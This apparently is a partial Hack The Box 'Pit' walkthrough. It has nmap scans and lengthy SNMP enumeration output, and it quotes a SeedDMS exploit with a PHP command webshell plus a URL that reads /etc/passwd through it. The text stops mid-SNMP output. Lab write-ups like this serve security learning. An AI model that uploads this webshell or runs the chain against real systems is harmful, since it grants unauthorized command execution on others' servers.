16 minutes
Pit
Enum
NMAP
# Nmap 7.80 scan initiated Mon May 17 03:43:06 2021 as: nmap -sCV -p- -oN nmap 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.041s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.80%T=SSL%I=7%D=5/17%Time=60A21F7C%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 17 03:49:12 2021 -- 1 IP address (1 host up) scanned in 366.86 seconds
UDP
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-18 03:16 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.041s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 1094.54 seconds
Port 80
Visiting the page shows nginx RHEL start page.
From the SNMP enum we got information about another directory path.
We can visit http://dms-pit.htb/seeddms51x/seeddms/
Googling after default credentials shows admin:admin. These do not work however. If we try with michelle:michelle we are granted access.
There is a post which mentions that the version has been upgraded to 5.1.15 which there is a RCE vuln for.
┌──(bob㉿kali)-[~/htb/pit/snmp]
└─$ searchsploit seeddms 130 ⨯
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------
From the exploit
Exploit Steps:
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
PHP Backdoor Code:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
Port 161
In order to convert the MIBS output that is generated when poking at SNMP we need to instal an additional package.
sudo apt install snmp-mibs-downloader -> Needed in order to convert MIBS to human readable.
Then comment out mibs: in /etc/snmp/snmp.conf
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
#mibs :
[...]
snmpwalk -c public -v2c 10.10.10.241 .1
SNMPv2-MIB::sysDescr.0 = STRING: Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (8368749) 23:14:47.49
SNMPv2-MIB::sysContact.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
SNMPv2-MIB::sysName.0 = STRING: pit.htb
SNMPv2-MIB::sysLocation.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.8 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (1) 0:00:00.01
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (8371797) 23:15:17.97
HOST-RESOURCES-MIB::hrSWRunIndex.1 = INTEGER: 1
HOST-RESOURCES-MIB::hrSWRunIndex.2 = INTEGER: 2
HOST-RESOURCES-MIB::hrSWRunIndex.3 = INTEGER: 3
HOST-RESOURCES-MIB::hrSWRunIndex.4 = INTEGER: 4
HOST-RESOURCES-MIB::hrSWRunIndex.6 = INTEGER: 6
HOST-RESOURCES-MIB::hrSWRunIndex.9 = INTEGER: 9
HOST-RESOURCES-MIB::hrSWRunIndex.10 = INTEGER: 10
HOST-RESOURCES-MIB::hrSWRunIndex.11 = INTEGER: 11
HOST-RESOURCES-MIB::hrSWRunIndex.12 = INTEGER: 12
HOST-RESOURCES-MIB::hrSWRunIndex.13 = INTEGER: 13
HOST-RESOURCES-MIB::hrSWRunIndex.14 = INTEGER: 14
HOST-RESOURCES-MIB::hrSWRunIndex.15 = INTEGER: 15
<SNIP>
UCD-SNMP-MIB::dskPath.1 = STRING: /
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
UCD-SNMP-MIB::dskDevice.1 = STRING: /dev/mapper/cl-root
UCD-SNMP-MIB::dskDevice.2 = STRING: /dev/mapper/cl-seeddms
UCD-SNMP-MIB::dskMinimum.1 = INTEGER: 10000
UCD-SNMP-MIB::dskMinimum.2 = INTEGER: 100000
UCD-SNMP-MIB::dskMinPercent.1 = INTEGER: -1
UCD-SNMP-MIB::dskMinPercent.2 = INTEGER: -1
UCD-SNMP-MIB::dskTotal.1 = INTEGER: 2611200
UCD-SNMP-MIB::dskTotal.2 = INTEGER: 125600
UCD-SNMP-MIB::dskAvail.1 = INTEGER: 347356
UCD-SNMP-MIB::dskAvail.2 = INTEGER: 75496
UCD-SNMP-MIB::dskUsed.1 = INTEGER: 2263844
UCD-SNMP-MIB::dskUsed.2 = INTEGER: 50104
UCD-SNMP-MIB::dskPercent.1 = INTEGER: 87
UCD-SNMP-MIB::dskPercent.2 = INTEGER: 40
UCD-SNMP-MIB::dskPercentNode.1 = INTEGER: 7
UCD-SNMP-MIB::dskPercentNode.2 = INTEGER: 4
UCD-SNMP-MIB::dskTotalLow.1 = Gauge32: 2611200
UCD-SNMP-MIB::dskTotalLow.2 = Gauge32: 125600
UCD-SNMP-MIB::dskTotalHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskTotalHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskAvailLow.1 = Gauge32: 347356
UCD-SNMP-MIB::dskAvailLow.2 = Gauge32: 75496
UCD-SNMP-MIB::dskAvailHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskAvailHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskUsedLow.1 = Gauge32: 2263844
UCD-SNMP-MIB::dskUsedLow.2 = Gauge32: 50104
UCD-SNMP-MIB::dskUsedHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskUsedHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskErrorFlag.1 = INTEGER: noError(0)
UCD-SNMP-MIB::dskErrorFlag.2 = INTEGER: error(1)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."monitoring" = STRING: Memory usage
Trying https://github.com/dheiland-r7/snmp
./snmpbw.pl 10.10.10.241 public 2 4
.1.3.6.1.2.1.1.1.0 = STRING: Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
.1.3.6.1.2.1.1.2.0 = OID: .1.3.6.1.4.1.8072.3.2.10
.1.3.6.1.2.1.1.3.0 = Timeticks: (16564064) 1 day, 22:00:40.64
.1.3.6.1.2.1.1.4.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
.1.3.6.1.2.1.1.5.0 = STRING: pit.htb
.1.3.6.1.2.1.1.6.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
.1.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.2.1 = OID: .1.3.6.1.6.3.10.3.1.1
.1.3.6.1.2.1.1.9.1.2.2 = OID: .1.3.6.1.6.3.11.3.1.1
.1.3.6.1.2.1.1.9.1.2.3 = OID: .1.3.6.1.6.3.15.2.1.1
.1.3.6.1.2.1.1.9.1.2.4 = OID: .1.3.6.1.6.3.1
.1.3.6.1.2.1.1.9.1.2.5 = OID: .1.3.6.1.6.3.16.2.2.1
.1.3.6.1.2.1.1.9.1.2.6 = OID: .1.3.6.1.2.1.49
.1.3.6.1.2.1.1.9.1.2.7 = OID: .1.3.6.1.2.1.4
.1.3.6.1.2.1.1.9.1.2.8 = OID: .1.3.6.1.2.1.50
.1.3.6.1.2.1.1.9.1.2.9 = OID: .1.3.6.1.6.3.13.3.1.3
.1.3.6.1.2.1.1.9.1.2.10 = OID: .1.3.6.1.2.1.92
.1.3.6.1.2.1.1.9.1.3.1 = STRING: The SNMP Management Architecture MIB.
.1.3.6.1.2.1.1.9.1.3.2 = STRING: The MIB for Message Processing and Dispatching.
.1.3.6.1.2.1.1.9.1.3.3 = STRING: The management information definitions for the SNMP User-based Security Model.
.1.3.6.1.2.1.1.9.1.3.4 = STRING: The MIB module for SNMPv2 entities
.1.3.6.1.2.1.1.9.1.3.5 = STRING: View-based Access Control Model for SNMP.
.1.3.6.1.2.1.1.9.1.3.6 = STRING: The MIB module for managing TCP implementations
.1.3.6.1.2.1.1.9.1.3.7 = STRING: The MIB module for managing IP and ICMP implementations
.1.3.6.1.2.1.1.9.1.3.8 = STRING: The MIB module for managing UDP implementations
.1.3.6.1.2.1.1.9.1.3.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
.1.3.6.1.2.1.1.9.1.3.10 = STRING: The MIB module for logging SNMP Notifications.
.1.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.25.1.1.0 = Timeticks: (16566976) 1 day, 22:01:09.76
.1.3.6.1.2.1.25.4.2.1.1.1 = INTEGER: 1
.1.3.6.1.2.1.25.4.2.1.1.2 = INTEGER: 2
[...]
.1.3.6.1.2.1.25.4.2.1.1.25361 = INTEGER: 25361
.1.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
.1.3.6.1.2.1.25.4.2.1.2.2 = STRING: "kthreadd"
.1.3.6.1.2.1.25.4.2.1.2.3 = STRING: "rcu_gp"
.1.3.6.1.2.1.25.4.2.1.2.4 = STRING: "rcu_par_gp"
.1.3.6.1.2.1.25.4.2.1.2.6 = STRING: "kworker/0:0H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.9 = STRING: "mm_percpu_wq"
.1.3.6.1.2.1.25.4.2.1.2.10 = STRING: "ksoftirqd/0"
.1.3.6.1.2.1.25.4.2.1.2.11 = STRING: "rcu_sched"
.1.3.6.1.2.1.25.4.2.1.2.12 = STRING: "migration/0"
.1.3.6.1.2.1.25.4.2.1.2.13 = STRING: "watchdog/0"
.1.3.6.1.2.1.25.4.2.1.2.14 = STRING: "cpuhp/0"
.1.3.6.1.2.1.25.4.2.1.2.15 = STRING: "cpuhp/1"
.1.3.6.1.2.1.25.4.2.1.2.16 = STRING: "watchdog/1"
.1.3.6.1.2.1.25.4.2.1.2.17 = STRING: "migration/1"
.1.3.6.1.2.1.25.4.2.1.2.18 = STRING: "ksoftirqd/1"
.1.3.6.1.2.1.25.4.2.1.2.20 = STRING: "kworker/1:0H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.23 = STRING: "kdevtmpfs"
.1.3.6.1.2.1.25.4.2.1.2.24 = STRING: "netns"
.1.3.6.1.2.1.25.4.2.1.2.25 = STRING: "kauditd"
.1.3.6.1.2.1.25.4.2.1.2.26 = STRING: "khungtaskd"
.1.3.6.1.2.1.25.4.2.1.2.27 = STRING: "oom_reaper"
.1.3.6.1.2.1.25.4.2.1.2.28 = STRING: "writeback"
.1.3.6.1.2.1.25.4.2.1.2.29 = STRING: "kcompactd0"
.1.3.6.1.2.1.25.4.2.1.2.30 = STRING: "ksmd"
.1.3.6.1.2.1.25.4.2.1.2.31 = STRING: "khugepaged"
.1.3.6.1.2.1.25.4.2.1.2.32 = STRING: "crypto"
.1.3.6.1.2.1.25.4.2.1.2.33 = STRING: "kintegrityd"
.1.3.6.1.2.1.25.4.2.1.2.34 = STRING: "kblockd"
.1.3.6.1.2.1.25.4.2.1.2.35 = STRING: "blkcg_punt_bio"
.1.3.6.1.2.1.25.4.2.1.2.36 = STRING: "tpm_dev_wq"
.1.3.6.1.2.1.25.4.2.1.2.37 = STRING: "md"
.1.3.6.1.2.1.25.4.2.1.2.38 = STRING: "edac-poller"
.1.3.6.1.2.1.25.4.2.1.2.39 = STRING: "watchdogd"
.1.3.6.1.2.1.25.4.2.1.2.40 = STRING: "pm_wq"
.1.3.6.1.2.1.25.4.2.1.2.68 = STRING: "kswapd0"
.1.3.6.1.2.1.25.4.2.1.2.161 = STRING: "kthrotld"
.1.3.6.1.2.1.25.4.2.1.2.162 = STRING: "irq/24-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.163 = STRING: "irq/25-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.164 = STRING: "irq/26-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.165 = STRING: "irq/27-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.166 = STRING: "irq/28-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.167 = STRING: "irq/29-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.168 = STRING: "irq/30-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.169 = STRING: "irq/31-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.170 = STRING: "irq/32-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.171 = STRING: "irq/33-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.172 = STRING: "irq/34-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.173 = STRING: "irq/35-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.174 = STRING: "irq/36-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.175 = STRING: "irq/37-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.176 = STRING: "irq/38-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.177 = STRING: "irq/39-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.178 = STRING: "irq/40-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.179 = STRING: "irq/41-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.180 = STRING: "irq/42-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.181 = STRING: "irq/43-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.182 = STRING: "irq/44-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.183 = STRING: "irq/45-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.184 = STRING: "irq/46-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.185 = STRING: "irq/47-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.186 = STRING: "irq/48-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.187 = STRING: "irq/49-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.188 = STRING: "irq/50-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.189 = STRING: "irq/51-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.190 = STRING: "irq/52-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.191 = STRING: "irq/53-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.192 = STRING: "irq/54-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.193 = STRING: "irq/55-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.194 = STRING: "acpi_thermal_pm"
.1.3.6.1.2.1.25.4.2.1.2.195 = STRING: "kmpath_rdacd"
.1.3.6.1.2.1.25.4.2.1.2.196 = STRING: "kaluad"
.1.3.6.1.2.1.25.4.2.1.2.198 = STRING: "ipv6_addrconf"
.1.3.6.1.2.1.25.4.2.1.2.199 = STRING: "kstrp"
.1.3.6.1.2.1.25.4.2.1.2.518 = STRING: "mpt_poll_0"
.1.3.6.1.2.1.25.4.2.1.2.519 = STRING: "mpt/0"
.1.3.6.1.2.1.25.4.2.1.2.520 = STRING: "ata_sff"
.1.3.6.1.2.1.25.4.2.1.2.527 = STRING: "scsi_eh_0"
.1.3.6.1.2.1.25.4.2.1.2.528 = STRING: "scsi_tmf_0"
.1.3.6.1.2.1.25.4.2.1.2.529 = STRING: "scsi_eh_1"
.1.3.6.1.2.1.25.4.2.1.2.530 = STRING: "scsi_tmf_1"
.1.3.6.1.2.1.25.4.2.1.2.531 = STRING: "scsi_eh_2"
.1.3.6.1.2.1.25.4.2.1.2.532 = STRING: "scsi_eh_3"
.1.3.6.1.2.1.25.4.2.1.2.533 = STRING: "scsi_tmf_2"
.1.3.6.1.2.1.25.4.2.1.2.534 = STRING: "scsi_tmf_3"
.1.3.6.1.2.1.25.4.2.1.2.535 = STRING: "scsi_eh_4"
.1.3.6.1.2.1.25.4.2.1.2.536 = STRING: "scsi_tmf_4"
.1.3.6.1.2.1.25.4.2.1.2.537 = STRING: "scsi_eh_5"
.1.3.6.1.2.1.25.4.2.1.2.538 = STRING: "scsi_tmf_5"
.1.3.6.1.2.1.25.4.2.1.2.539 = STRING: "scsi_eh_6"
.1.3.6.1.2.1.25.4.2.1.2.540 = STRING: "scsi_tmf_6"
.1.3.6.1.2.1.25.4.2.1.2.541 = STRING: "scsi_eh_7"
.1.3.6.1.2.1.25.4.2.1.2.542 = STRING: "scsi_tmf_7"
.1.3.6.1.2.1.25.4.2.1.2.543 = STRING: "scsi_eh_8"
.1.3.6.1.2.1.25.4.2.1.2.544 = STRING: "scsi_tmf_8"
.1.3.6.1.2.1.25.4.2.1.2.545 = STRING: "scsi_eh_9"
.1.3.6.1.2.1.25.4.2.1.2.546 = STRING: "scsi_tmf_9"
.1.3.6.1.2.1.25.4.2.1.2.547 = STRING: "scsi_eh_10"
.1.3.6.1.2.1.25.4.2.1.2.548 = STRING: "scsi_tmf_10"
.1.3.6.1.2.1.25.4.2.1.2.549 = STRING: "scsi_eh_11"
.1.3.6.1.2.1.25.4.2.1.2.550 = STRING: "scsi_tmf_11"
.1.3.6.1.2.1.25.4.2.1.2.551 = STRING: "scsi_eh_12"
.1.3.6.1.2.1.25.4.2.1.2.552 = STRING: "scsi_tmf_12"
.1.3.6.1.2.1.25.4.2.1.2.553 = STRING: "scsi_eh_13"
.1.3.6.1.2.1.25.4.2.1.2.554 = STRING: "scsi_tmf_13"
.1.3.6.1.2.1.25.4.2.1.2.555 = STRING: "scsi_eh_14"
.1.3.6.1.2.1.25.4.2.1.2.556 = STRING: "scsi_tmf_14"
.1.3.6.1.2.1.25.4.2.1.2.557 = STRING: "scsi_eh_15"
.1.3.6.1.2.1.25.4.2.1.2.558 = STRING: "scsi_tmf_15"
.1.3.6.1.2.1.25.4.2.1.2.559 = STRING: "irq/16-vmwgfx"
.1.3.6.1.2.1.25.4.2.1.2.560 = STRING: "scsi_eh_16"
.1.3.6.1.2.1.25.4.2.1.2.561 = STRING: "scsi_tmf_16"
.1.3.6.1.2.1.25.4.2.1.2.562 = STRING: "ttm_swap"
.1.3.6.1.2.1.25.4.2.1.2.563 = STRING: "scsi_eh_17"
.1.3.6.1.2.1.25.4.2.1.2.564 = STRING: "scsi_tmf_17"
.1.3.6.1.2.1.25.4.2.1.2.565 = STRING: "scsi_eh_18"
.1.3.6.1.2.1.25.4.2.1.2.566 = STRING: "scsi_tmf_18"
